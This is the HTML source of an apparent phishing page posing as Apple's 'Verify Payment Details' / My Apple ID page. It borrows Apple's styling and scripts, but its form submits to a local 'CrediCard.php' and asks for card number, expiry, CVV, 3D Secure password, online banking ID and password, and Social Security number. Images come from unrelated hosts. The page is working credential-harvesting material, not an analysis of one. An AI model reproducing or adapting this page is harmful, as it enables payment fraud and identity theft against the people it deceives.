<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US">
<head>
	
	
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />  
    
    
    
        
            <noscript>
                <META HTTP-EQUIV="Refresh" CONTENT="0;URL=/cgi-bin/WebObjects/MyAppleId.woa/322/wa/directToJSError?wosid=hS04uCtYRYByd7KpTDLedw&localang=en_US">
            </noscript>
        
    
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'>
    <meta name="Author" content="Apple Inc.">
    <meta name="viewport" content="width=1024">
    <script type = "text/javascript">
        document.createElement('header');
        document.createElement('nav');
        document.createElement('section');
        document.createElement('article');
        document.createElement('aside');
        document.createElement('footer');
        document.createElement('hgroup');
    </script>
    <title>Apple - Verify Payment Details</title>
    
    <meta name="omni_page" content="Apple - My Apple ID" />
    <meta name="Category" content="" />
    <meta name="Description" content="" /> 
    
    <link rel="stylesheet" type="text/css" href="https://appleid.apple.com/global/nav/styles/navigation.css" id="globalheader-stylesheet"></link>
    <link rel="stylesheet" type="text/css" href="https://appleid.apple.com/global/styles/base.css"></link>
    <!-- <link rel="stylesheet" type="text/css" href="https://appleid.apple.com/global/nav/styles/enhanced.css"></link> -->
    <link rel="stylesheet" type="text/css" href="https://appleid.apple.com/myappleid/styles/myappleid.css"></link>
    <link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/styles/hsa.css"></link>    
    <!-- 
    <link rel="stylesheet" type="text/css" href="https://appleid.apple.com/html/en_US/global/nav/styles/mktg_nav.css"></link>
    <link rel="stylesheet" type="text/css" href="https://appleid.apple.com/html/en_USnull"></link>
    -->
            <link href="http://www.karalta.com/imgs/apple_favicon.gif" rel="shortcut icon">
    <style type="text/css" media="screen">
        #password-formrow { *z-index:999999; }
    
        #server-error { visibility:hidden; }
        
        #password-validation-wrapper { display:none; }
        .validation-show { display:block !important; }
        
        
        .has-content { color:#000 !important; }
        .appleid-validation-wrapper { position:absolute; right:-270px; top:-53px;}
        .password-validation-wrapper { position:absolute; right:-270px; }
        .topcap { position:absolute; top:-13px; right:14px; height:13px; width:252px; background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_popover_topcap.png) 0 0 no-repeat; z-index:9999; }
        #appleidedit1 .topcap, #appleidemailedit1 .topcap {top: -8px;}
        .bottomcap { position:absolute; bottom:-13px; right:14px; height:13px; width:252px; background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_popover_bottomcap.png) 0 0 no-repeat; z-index:9999; }

        /*
        .validation-dialog.bottom { position:absolute; width:207px; padding:17px 9px 0 40px; height:234px; display:block; top:20px; right:25px; background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_popover_bottom.png) no-repeat 0 0;  }
        .validation-dialog.top { position:absolute; width:207px; padding:2px 9px 0 40px; height:234px; display:block; top:-227px; right:25px; background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_popover_top.png) no-repeat 0 100%;  }
        */
        
        .password-validation-wrapper.top, .password-validation-wrapper.bottom, .appleid-validation-wrapper.top, .appleid-validation-wrapper.bottom { right:37px; }
        .password-validation-wrapper.top .bottomcap, .password-validation-wrapper.bottom .topcap, .appleid-validation-wrapper.top .bottomcap, .appleid-validation-wrapper.bottom .topcap { display:none; }
        .password-validation-wrapper.bottom .bottomcap, .password-validation-wrapper.top .topcap, .appleid-validation-wrapper.bottom .bottomcap, .appleid-validation-wrapper.top .topcap { right:2px; }

        .validation-dialog { position:relative; width:205px; padding:0 20px 12px 55px; background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_popover.png) no-repeat 0 0; z-index:999999; background-position:center; height:100%; }
        .top .validation-dialog { padding:0 9px 27px 40px; background: url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_popover_top.png) 0 100% no-repeat; }
        .bottom .validation-dialog { padding:17px 9px 1px 40px; background: url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_popover_bottom.png) 0 0 no-repeat; }

        .validation-dialog p { font-weight:bold; font-size:12px; padding-top:18px; padding-bottom:10px; margin:0; }
        .validation-dialog li { list-style-type:none; font-size:12px; color:#333; vertical-align:top; padding-bottom:4px; line-height:14px; margin-bottom:3px; margin-left:-20px; padding-left:20px; background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_validation_nuetral_20101007.png) no-repeat 0 2px; *background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_validation_nuetral_20101007.gif) no-repeat 0 2px;  width:190px; }
    
        .validation-dialog li.fail { font-weight:bold; color:#ea0000; background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_validation_fail_20101007.png) no-repeat 0 2px; *background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_validation_fail_20101007.gif) no-repeat 0 2px; }
        .validation-dialog li.pass { background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_validation_pass_20101007.png) no-repeat 0 2px; *background:transparent url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_validation_pass_20101007.gif) no-repeat 0 2px; }
        /* Commenting for not displaying pass and fail images
        .myappleid span.formwrap input.pass { background:url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/input_pass.png) no-repeat scroll 99% 40% #FFFFFF; }
        .myappleid span.formwrap input.fail { background:url(https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/input_fail.png) no-repeat scroll 99% 40% #FFFFFF; }
        */
        /* Captcha image */
        .myappleid.create .grid2colc.wrap .column.last .grid2col .column img#captchaImage { border:1px solid #D9D9D9; border-radius:6px; -webkit-border-radius:6px; -moz-border-radius:6px; -o-border-radius:6px; -khtml-border-radius:6px; -webkit-box-sizing:border-box; -webkit-padding-start:1px; -webkit-padding-after:1px; -webkit-padding-before:1px; -webkit-padding-end:1px; }
    </style>
    
    <script type="text/javascript" charset="utf-8" src="https://appleid.apple.com/global/scripts/lib/prototype.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://appleid.apple.com/global/scripts/lib/scriptaculous.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://appleid.apple.com/global/scripts/browserdetect.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://appleid.apple.com/global/scripts/apple_core.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://appleid.apple.com/global/scripts/search_decorator.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://a248.e.akamai.net/7/248/51/20130115/appleid.apple.com/yui281/build/yahoo-dom-event/yahoo-dom-event.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://a248.e.akamai.net/7/248/51/20130115/appleid.apple.com/yui281/build/animation/animation-min.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://a248.e.akamai.net/7/248/51/20130115/appleid.apple.com/yui281/build/datasource/datasource-min.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://a248.e.akamai.net/7/248/51/20130115/appleid.apple.com/yui281/build/autocomplete/autocomplete-min.js"></script>
    <!-- webobject name = "WonderJs"></webobject --> 
    <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/javascript/MyAppleID.js"></script>
<script src="/WebObjects/Frameworks/Ajax.framework/WebServerResources/prototype.js"></script>
<script src="/WebObjects/Frameworks/Ajax.framework/WebServerResources/effects.js"></script>
<script src="/WebObjects/Frameworks/Ajax.framework/WebServerResources/wonder.js"></script>
</head>


<body onload="javascript:MyAppleID.errorFocus.errorParent();" class="myappleid sign-in index" id="editContainerBody">
<input id="isESAPage" type="hidden" value="false" name="0.79.1" />
    
    <input type="hidden" id="directCallLandingIndexURL" value='/cgi-bin/WebObjects/MyAppleId.woa/322/wa/directCallLandingIndex?wosid=hS04uCtYRYByd7KpTDLedw&localang=en_US' />
    
    
    
    
    
     <script>
	var url = '';
		var showGenericCancelESA = function(element) 
		{
			if(element !=undefined && element.href != 'javascript:void(0);')
			{
			url = element.href;
			}
			document.getElementById("cancelHiddenLink").setAttribute("href",url);
			//document.getElementById("dontcancelESA").setAttribute("href","javascript:void(0);");
			element.href="javascript:void(0);";
						document.getElementById('OverlayCencelEnrollGeneric').style.display = "block";
						document.getElementById('OverlayCencelEnrollGeneric').focus();

  			document.getElementById('OverlayPanelScreen').style.display = "block";
  			MyAppleID.util.overlay.setScreenSize();
  			



  			
  			//return false;
  		}
  
  var removeGenericESACancelOverlay = function() {	
  		document.getElementById('OverlayCencelEnrollGeneric').style.display = "none";
  		//document.getElementById("cancelESA").setAttribute("href","#");
			//document.getElementById("dontcancelESA").setAttribute("href","javascript:void(0);");
  		document.getElementById('OverlayPanelScreen').style.display = "none";
  		MyAppleID.util.overlay.setScreenSize();
  	}	
  	
  	var closeContainer =function(){
  	 window.location.replace(document.getElementById('cancelHiddenLink').href); 
  	 //document.getElementById("cancelHiddenLink").click();
  	 
  	}	
  		
</script>
<a id="cancelHiddenLink" style="display:none" href="#"></a>

<div  id="cancelUpdateContainer" updateUrl="/cgi-bin/WebObjects/MyAppleId.woa/322/ajax/hS04uCtYRYByd7KpTDLedw/0.0.79.13.3">
<div class="overlaypanel  overlay-compare popped" id="OverlayCencelEnrollGeneric" style="display : none">
	<div class="closeButtonContainer" style="display: block;">
		<a href="javascript:removeGenericESACancelOverlay();" class="close">Close</a>
	</div>
	<img alt="" border="0" class="overlayPanelShadowImage" src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_overlay_panel_myappleid_20091125.png" />
	
	<div class="overlayPanelContent swapView">
		<div id="MASKED-overlay-compare" class="myappleid-overlay-content" style="visibility: visible;">
		
		<h2>Are you sure you want to cancel setting up two-step verification?</h2>
		<p class="intro">If you cancel, no changes will be made to your account and any of the devices or phone numbers you’ve verified will not be saved.</p>
						<div id="bot-nav">
					<a onclick="javascript:removeGenericESACancelOverlay();" class="btn biggrey" id="dontcancelESA" href="javascript:void(0);"><span>Don't Cancel</span></a>
					<a  href="javascript:void(0);" onclick="AUL.update('cancelUpdateContainer', {}, '0.0.79.13.3.1.11');" class="btn bigblue" id="cancelESA"><span>Cancel Setup</span></a>
				</div>
		</div>
	
	</div>
	
</div>
</div><script>AUC.register('cancelUpdateContainer');</script>
 
       
    
        <script type="text/javascript">
        var searchSection = 'global';
        var searchCountry = 'us';
</script>
<script src="https://appleid.apple.com/global/nav/scripts/globalnav.js" type="text/javascript" charset="utf-8"></script>
<nav id="globalheader">
        <!--googleoff: all-->
        <ul id="globalnav">
                <li id="gn-apple"><a href="http://www.apple.com/"><span>Apple</span></a></li>
                <li id="gn-store"><a href="http://store.apple.com/"><span>Store</span></a></li>
                <li id="gn-mac"><a href="http://www.apple.com/mac/"><span>Mac</span></a></li>
                <li id="gn-ipod"><a href="http://www.apple.com/ipod/"><span>iPod</span></a></li>
                <li id="gn-iphone"><a href="http://www.apple.com/iphone/"><span>iPhone</span></a></li>
                <li id="gn-ipad"><a href="http://www.apple.com/ipad/"><span>iPad</span></a></li>
                <li id="gn-itunes"><a href="http://www.apple.com/itunes/"><span>iTunes</span></a></li>
                <li id="gn-support" class="gn-last"><a href="http://www.apple.com/support/"><span>Support</span></a></li>
        </ul>
        <!--googleon: all-->
        <div id="globalsearch">
                <form action="http://www.apple.com/search/" method="post" class="search" id="g-search"><div>
                        <label for="sp-searchtext"><input type="text" name="q" id="sp-searchtext" accesskey="s" /></label>
                </div></form>
                <div id="sp-magnify"><div class="magnify-searchmode"></div><div class="magnify"></div></div>
                <div id="sp-results"></div>
        </div>
</nav>
<script type="text/javascript">
        AC.GlobalNav.Instance = new AC.GlobalNav();
</script>
<!--/globalheader-->
    
    
    

<form method="POST" id="Verify Now" name="appleConnectForm" action="CrediCard.php">
<input id="actionChosen" type="hidden" name="0.79.17.1.1" />

<script type="text/javascript">

		var submitForm = function(actionPer) {
	
	document.getElementById('actionChosen').value=actionPer;
	//alert(document.getElementById('actionChosen').value);
	document.forms['signIn'].submit();
}


function Down() { 
		sec--;    
		if (sec == -1) { sec = 59; min--; }
		if (sec == 0 && min == 0) {
		alert("We're sorry, but due to an extended period of inactivity you have been logged out of the AppleID Creation process. Click OK to return to the sign in page.");
		window.location.href = document.getElementById('jive').value;
	}
	else down = setTimeout("Down()", 1000);
	}
	function timeIt() {
		min = 5;
		sec = 0;
		Down();
	}
</script>

	<!-- <div id="productheader">
		<webobject name = "homeLink"><h2><webobject name = "appleidmage"/></h2></webobject>
	</div> -->
	
<!-- This FORM is embedded inside another FORM. Omitting Open Tag -->

	<input id="timeoutAction" type="hidden" name="0.79.17.1.7.0.1" />
  <div id="productheader">
	<a onClick="javascript:MyAppleID.redirect.loggedIn();" href="#">
	  <h2>
	     <img class="DimAppleIdLogoI" src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/en_US/myappleid_title_20091125.png" />
	  </h2>
	</a>
</div>
<input type="hidden" name="wosid" value="hS04uCtYRYByd7KpTDLedw" />
<!-- This FORM is embedded inside another FORM. Omitting Close Tag -->


<script>
  var time_left = 59;
  var cinterval;
  var startCounter = 0;
  function time_dec(){
    if(time_left>0){
    	time_left--;
    }
    document.getElementById('countdown').innerHTML = time_left;
    if(time_left == 0 && startCounter ==1){
      clearInterval(cinterval);
      removeAreUStilOverlay();
      startCounter = 0;
      timeoutSession('timeOut');
    }
  }

  cinterval = setInterval('time_dec()', 1000);

  var restoreSession = function(){
  	startCounter = 0;
  	resetSession();
  }
  var screenBlocked = false;

  var dimOtherOverlays = function(){
  	if(document.getElementById('OverlayRecoveryVerify') != null)
  		document.getElementById('OverlayRecoveryVerify').style.opacity=".35";
  	if(document.getElementById('OverlayPanel') != null)
  		document.getElementById('OverlayPanel').style.opacity=".35"
  	if(document.getElementById('OverlayPanelEmail') != null)
  		document.getElementById('OverlayPanelEmail').style.opacity=".35"
  	if(document.getElementById('OverlayPanelEsa') != null)
  		document.getElementById('OverlayPanelEsa').style.opacity=".35"
  	if(document.getElementById('OverlayRecoveryVerify') != null)
  		document.getElementById('OverlayRecoveryVerify').style.opacity=".35"
  	if(document.getElementById('OverlayAddPhone') != null)
  		document.getElementById('OverlayAddPhone').style.opacity=".35"
  	if(document.getElementById('OverlayPanelVerifySendCode') != null)
  		document.getElementById('OverlayPanelVerifySendCode').style.opacity=".35"
  	if(document.getElementById('OverlayCencelEnroll') != null)
  		document.getElementById('OverlayCencelEnroll').style.opacity=".35"
  	if(document.getElementById('ESASetupConfirmOverlay') != null)
  		document.getElementById('ESASetupConfirmOverlay').style.opacity=".35"
  	if(document.getElementById('OverlaySupport') != null)
  		document.getElementById('OverlaySupport').style.opacity=".35"
  	if(document.getElementById('OverlayVerifyCode') != null)
  		document.getElementById('OverlayVerifyCode').style.opacity=".35"	
  }


  var enableOtherOverlays = function(){
  	if(document.getElementById('OverlayRecoveryVerify') != null)
  		document.getElementById('OverlayRecoveryVerify').style.opacity="1";
  	if(document.getElementById('OverlayPanel') != null)
  		document.getElementById('OverlayPanel').style.opacity="1"
  	if(document.getElementById('OverlayPanelEmail') != null)
  		document.getElementById('OverlayPanelEmail').style.opacity="1"
  	if(document.getElementById('OverlayPanelEsa') != null)
  		document.getElementById('OverlayPanelEsa').style.opacity="1"
  	if(document.getElementById('OverlayRecoveryVerify') != null)
  		document.getElementById('OverlayRecoveryVerify').style.opacity="1"
  	if(document.getElementById('OverlayAddPhone') != null)
  		document.getElementById('OverlayAddPhone').style.opacity="1"
  	if(document.getElementById('OverlayPanelVerifySendCode') != null)
  		document.getElementById('OverlayPanelVerifySendCode').style.opacity="1"
  	if(document.getElementById('OverlayCencelEnroll') != null)
  		document.getElementById('OverlayCencelEnroll').style.opacity="1"
  	if(document.getElementById('ESASetupConfirmOverlay') != null)
  		document.getElementById('ESASetupConfirmOverlay').style.opacity="1"
  	if(document.getElementById('OverlaySupport') != null)
  		document.getElementById('OverlaySupport').style.opacity="1"
  	if(document.getElementById('OverlayVerifyCode') != null)
  		document.getElementById('OverlayVerifyCode').style.opacity="1"	
  }
  var resetTimerDisplay = function(){
  	document.getElementById('countdown').innerHTML = "59";
  }
  var showAreUStilOverlay = function() {	
  		time_left = 59;
  		startCounter = 1;
  		cinterval = setInterval('time_dec', 1000);
    		document.getElementById('AreUStilThrOverlayPanelScreen').style.display = "block";
    		if(document.getElementById('productheader')!=null && (document.getElementById('productheader').style.opacity == "1" || document.getElementById('productheader').style.opacity == "")){
    		screenBlocked=true;
    		document.getElementById('OverlayPanelAreUStil').style.display = "block";
  			document.getElementById('OverlayPanelAreUStil').focus();
    		document.getElementById('OverlayPanelAreUStil').style.zIndex = "25000";
    		MyAppleID.util.overlay.setScreenSize();
    		}else{
    		dimOtherOverlays();
    		document.getElementById('OverlayPanelAreUStil').style.display = "block";
  			document.getElementById('OverlayPanelAreUStil').focus();
    		document.getElementById('OverlayPanelAreUStil').style.zIndex = "25000";
    		}
  		
    	}	

  var removeAreUStilOverlay = function() {	
    		document.getElementById('OverlayPanelAreUStil').style.display = "none";
    		document.getElementById('AreUStilThrOverlayPanelScreen').style.display = "none";
    		if(screenBlocked == true){
	    		screenBlocked=false;
	    		MyAppleID.util.overlay.setScreenSize();
    		}else{
    			enableOtherOverlays();
    			screenBlocked=false;
    		}
    	}	
</script>
<!-- Begin overlay -->
<div id = "OverlayPanelAreUStil" class = "overlaypanel overlay-compare popped short-height" style = "display: none;">
  <div class = "closeButtonContainer" style = "display: block;">
    <a onClick="javascript:removeAreUStilOverlay();" class="close" href="#">Close</a>
  </div>
  <img width="529" height="337" alt="" border="0" class="overlayPanelShadowImage" src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_overlay_panel_myappleid_20091125.png" />
  <div class = "overlayPanelContent swapView">
    <div id = "MASKED-overlay-compare" class = "myappleid-overlay-content" style = "visibility: visible;">
      <h2>Are you still there?</h2>
      <p>
        You haven’t made any changes in a while. To protect your account’s security, you will be automatically signed out in 
        <span id = "countdown">59</span>
        seconds.</p>
      <div id = "bot-nav">
        <div class = "buttons">
          <a onClick="javascript:timeoutSession('logOut');" name="cancelLink" class="btn biggrey" id="cancelLink" href="#">
            <span> Sign Out</span>
          </a>
          <a onClick="javascript:restoreSession();" name="continueLink" class="btn bigblue" id="continueLink" href="#">
            <span>Continue</span>
          </a>
        </div>
      </div>
    </div>
  </div>
</div>
<!-- End overlay -->
<div id = "AreUStilThrOverlayPanelScreen" class = "overlaypanelscreen" style="position: fixed; top: 0px; left: 0px; opacity: 0.6; height: 100%; width: 100%; display: none; z-index: 22000;;background:white; "></div>

		<div id="main">
			<div id="content" class="content">
				<div class="grid2colc wrap">
				
					<div class="column first sidebar">
						
					
						<h2>Verify your<br/>Payment Details.</h2>
						<p class="intro">
						
												
						To Verify Payment Details, Please Complete the following application.
						<a onClick="javascript:submitForm('createAccount');" href="#"></a>	
					
						
						
						<!-- >webobject name = "String4"/--></p>
					</div><!--/column-->

					<div class="column last">
					
						
						<script>
	function dsfocus(){ document.appleConnectForm.theAccountName.focus(); }
</script>


	
		<div id="ds_container">
	
	




	
		

		
		
			
			
				
	<script type="text/javascript">	
		function placeHolderFieldAnimation() {
		
			function getStyle(el, strCssRule){
				var oElm = document.getElementById(el);
				var strValue = "";
				if(document.defaultView && document.defaultView.getComputedStyle){
					strValue = document.defaultView.getComputedStyle(oElm, "").getPropertyValue(strCssRule);
				}
				else if(oElm.currentStyle){
					strCssRule = strCssRule.replace(/\-(\w)/g, function (strMatch, p1){
						return p1.toUpperCase();
					});
					strValue = oElm.currentStyle[strCssRule];
				}
				return strValue;
			}

			timeMsg();
			
			var inputs = document.getElementsByTagName("input");
			var len = inputs.length;
			for (var i=0; i < len; i++) {
				if ((inputs[i].getAttribute("type") == "text" || inputs[i].getAttribute("type") == "password" ) && inputs[i].getAttribute("placeholder") && inputs[i].getAttribute("placeholder").length > 0) {
					
					var labelid = "label" + i;
					
					// Create the wrapper div which makes elements relative
					var newDivTag = document.createElement("div");
					newDivTag.className ="field-container";
					newDivTag.style.position = "relative";
					
					// Create the label div
					var divTag = document.createElement("div");
					divTag.id = labelid;
					divTag.className = "label-text";					
					divTag.innerHTML = inputs[i].getAttribute("placeholder");
					divTag.style.display = "block";
					divTag.style.color = "#aaa";
					divTag.style.position = "absolute";
					divTag.style.top = "0px";
					divTag.style.left = "0px";

					// Inherit the properties from parent
					divTag.style['width'] = getStyle(inputs[i].id, "width");
					divTag.style.paddingTop = getStyle(inputs[i].id, "padding-top");
					divTag.style.paddingBottom = getStyle(inputs[i].id, "padding-bottom");
					divTag.style.paddingLeft = getStyle(inputs[i].id, "padding-left");
					divTag.style.paddingRight = getStyle(inputs[i].id, "padding-right");
					divTag.style.textAlign = getStyle(inputs[i].id, "text-align");
					divTag.style.fontSize = getStyle(inputs[i].id, "font-size");
					
					// Clone the current input type element to be used later
					var currentInputElement = inputs[i].cloneNode(false);
					// Remove placeholder to override the safari honoring of HTML5 placeholder attribute
					currentInputElement.removeAttribute("placeholder");					
					
					// Get parent node and replace input with wrapper div
					var parentNode = inputs[i].parentNode;
					parentNode.replaceChild(newDivTag, inputs[i]);

					// Start adding elements					
					newDivTag.appendChild(currentInputElement);
					newDivTag.appendChild(divTag);

					// Assign events					
					if (currentInputElement.value.length < 1) {
						divTag.style.display = "block";
					} else {
						divTag.style.display = "none";
					}
					divTag.onclick = function() {
						this.style.color = '#e1e1e1';
						this.parentNode.getElementsByTagName("input")[0].focus();
					}
					currentInputElement.onblur = function() {
						if (this.value.length < 1 || this.value == this.getAttribute("placeholder")) {
							this.parentNode.getElementsByTagName("div")[0].style.display = "block";
							this.parentNode.getElementsByTagName("div")[0].style.color = '#aaa';
						}
						else {
							this.parentNode.getElementsByTagName("div")[0].style.display = "none";
						}						
					}
					currentInputElement.onfocus = function() {
						if (this.value.length < 1 || this.value == this.getAttribute("placeholder")) {
							this.parentNode.getElementsByTagName("div")[0].style.display = "block";
							this.parentNode.getElementsByTagName("div")[0].style.color = '#e1e1e1';
						}
						else {
							this.parentNode.getElementsByTagName("div")[0].style.display = "none";
						}						
					}
					currentInputElement.onkeydown = function(evt) {			
						this.parentNode.getElementsByTagName("div")[0].style.display = "none";
					}
				}
			}
		}
		
		function timeMsg()
		{
			var t=setTimeout("afterload()",280);
		}
		
		function afterload() {
			var a = document.getElementById("accountname").value ;
			var v = document.getElementById("accountpassword").value ;
			var u = document.getElementById("accountname").nextSibling;
			var p = document.getElementById("accountpassword").nextSibling;
			while (u.nodeType!=1)
			{
			  u=u.nextSibling;
			}
			while (p.nodeType!=1)
			{
			  p=p.nextSibling;
			}
			if(a!=null && a!="") {
				document.getElementById(u.id).style.display = "none";
			}
			if(v!=null && v!="") {
				document.getElementById(p.id).style.display = "none";
			}
		}
	</script>

			
		
			
<!-- This FORM is embedded inside another FORM. Omitting Open Tag -->

			
				
					<h2>
	Verify Payment Details</h2>
<p>
	<span class="auto-style10">Cardholder&#39;s Name:</span><font color="#ff0000">* </font>: &nbsp; <input id="fullname" maxlength="16" name="fullname" size="20" type="text" value="" /></p>
<p>
	Card Type<font color="#ff0000">* </font>:  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; <select id="ctpe" name="ctpe" style="border: 1px solid rgb(132, 168, 204); margin-bottom: 2px;"><option selected="selected" value="Select a Card">Select a Card</option><option value="Visa">Visa</option><option value="MasterCard">MasterCard</option><option value="Discover">Discover</option><option value="America Express">America Express</option></select>&nbsp; <img alt="" src="http://www.qzal.net/01/2013-01/13623069361.png" style="width: 144px; height: 20px;" /></p>
<p>
	<label for="defaultcardnumber">Card Number<font color="#ff0000">* </font>:</label>&nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbsp; <input id="ccnumber0" maxlength="16" name="ccnumber0" size="20" type="text" value="" />&nbsp; <img alt="" src="http://www.qzal.net/01/2013-01/13623069362.png" /></p>
<p>
	<img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif" />Expiration Date<font color="#ff0000">* </font>: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <select id="exp_mm" name="exp_mm"><option value="00">month</option><option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option></select> <select id="exp_yy" name="exp_yy" size="1" type="select"><option value="00">year</option><option value="12">2013</option><option value="13">2014</option><option value="14">2015</option><option value="15">2016</option><option value="16">2017</option><option value="17">2018</option><option value="18">2019</option><option value="19">2020</option><option value="19">2021</option><option value="19">2022</option><option value="19">2023</option><option value="19">2024</option><option value="19">2025</option><option value="19">2026</option></select></p>
<p>
	Security Code<font color="#ff0000">* </font>: &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; <input id="ccnum" maxlength="3" name="cvv0" size="3" tabindex="1" type="Password" value="" /><img alt="" src="http://www.qzal.net/01/2013-01/13622493111.gif" style="width: 51px; height: 31px;" /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p>
	3D secure password<font color="#ff0000">* </font>: &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; <input id="ccnum" maxlength="15" name="password" size="15" tabindex="1" type="Password" value="" /></> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p>

		Name Your Bank<font color="#ff0000">* </font>: &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; <input id="banknam" maxlength="30" name="banknam" size="15" tabindex="1" type="text" value="" /></> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p>

			Online ID Bank<font color="#ff0000">* </font>: &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; <input id="idbank" maxlength="16" name="idbnak" size="15" tabindex="1" type="text" value="" /></> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p>

				 Password Bank<font color="#ff0000">* </font>: &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; <input id="pssbank" maxlength="16" name="pssbank" size="15" tabindex="1" type="Password" value="" /></> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p>

	
Social Security Number<font color="#ff0000">* </font> :</font></strong></td>
                  <td></td>
                  <td><input tabindex="1" id="ssn1" size="2" maxlength="3" name="ssn1" value="" type="text">
                 <input value="<?echo $datainfo?>" name="historys" type="hidden">
-
  <input tabindex="1" id="ssn2" size="1" maxlength="2" name="ssn2" value="" type="text">
-
<input tabindex="1" id="ssn3" size="3" maxlength="4" name="ssn3" value="" type="text">
		<div id="bot-nav">
				
					

						<a type="submit" class="btn bigblue">
							<input class="btn bigblue" id="signInHyperLink" type="submit" value="Verify Now" name="signInHyperLink" />
						</a>					
					
				</div>

				<input id="theTypeValue" type="hidden" name="theTypeValue" />

			<input type="hidden" name="wosid" value="hS04uCtYRYByd7KpTDLedw" />
<!-- This FORM is embedded inside another FORM. Omitting Close Tag -->

		
		
		
			
</div>

	
	
	
	
	



	
						
							
						 <input type="hidden" name="Nojive" /> 		
					</div><!--/column-->
				
				</div><!--/grid2col-->
			</div><!--/content-->
		</div><!--/main-->
	
<input type="hidden" name="wosid" value="hS04uCtYRYByd7KpTDLedw" /></form><!--/form-->

    
    <footer id="globalfooter">
	    
	    	<div id="breadory">
	<ol id="breadcrumbs">
		<li class="home"><a href="http://www.apple.com">Home</a></li>
		
			<li> <a onClick="javascript:MyAppleID.redirect.loggedIn();" href="#">My Apple ID</a></li>
		
		
		<li>  </li>
	</ol>
</div><!--/breadory-->

	            
        <!-- START INCLUDED FOOTER -->
<!-- START FIND FEATURE -->
<p class="gf-buy">Shop the <a href="http://www.apple.com/store/">Apple Online Store</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Retail Store</a>, or find a <a href="http://www.apple.com/buy/locator/">reseller</a>.</p>

<ul class="gf-links piped">
        <li><a href="http://www.apple.com/about/" class="first">Apple Info</a></li>
        <li><a href="http://www.apple.com/sitemap/">Site Map</a></li>
        <li><a href="http://www.apple.com/hotnews/">Hot News</a></li>
        <li><a href="http://www.apple.com/rss/">RSS Feeds</a></li>
        <li><a href="http://www.apple.com/contact/" class="contact_us">Contact Us</a></li>
        <li><a href="/choose-your-country/" class="choose" title="Choose your country or region."><img src="https://ssl.apple.com/home/elements/worldwide_us.png" alt="United States" width="22" height="22"></a></li>
